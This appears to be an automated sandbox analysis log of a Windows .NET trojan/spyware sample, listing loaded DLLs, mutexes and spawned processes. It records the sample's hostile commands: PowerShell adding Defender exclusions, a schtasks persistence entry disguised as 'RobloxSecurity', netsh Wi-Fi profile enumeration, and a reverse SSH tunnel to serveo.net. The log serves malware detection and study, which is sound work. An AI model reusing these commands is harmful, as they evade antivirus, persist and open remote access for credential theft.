Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll

Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: jqOHOuPMJP.exe, BootstrapLoader.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: jqOHOuPMJP.exe, BootstrapLoader.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@66/19@3/6

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Mutant created: \Sessions\1\BaseNamedObjects\jo0x2dte3z
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

File created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe

Jump to behavior

Source: jqOHOuPMJP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: jqOHOuPMJP.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD747C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: jqOHOuPMJP.exe	ReversingLabs: Detection: 13%
Source: jqOHOuPMJP.exe	Virustotal: Detection: 24%

Source: unknown	Process created: C:\Users\user\Desktop\jqOHOuPMJP.exe C:\Users\user\Desktop\jqOHOuPMJP.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
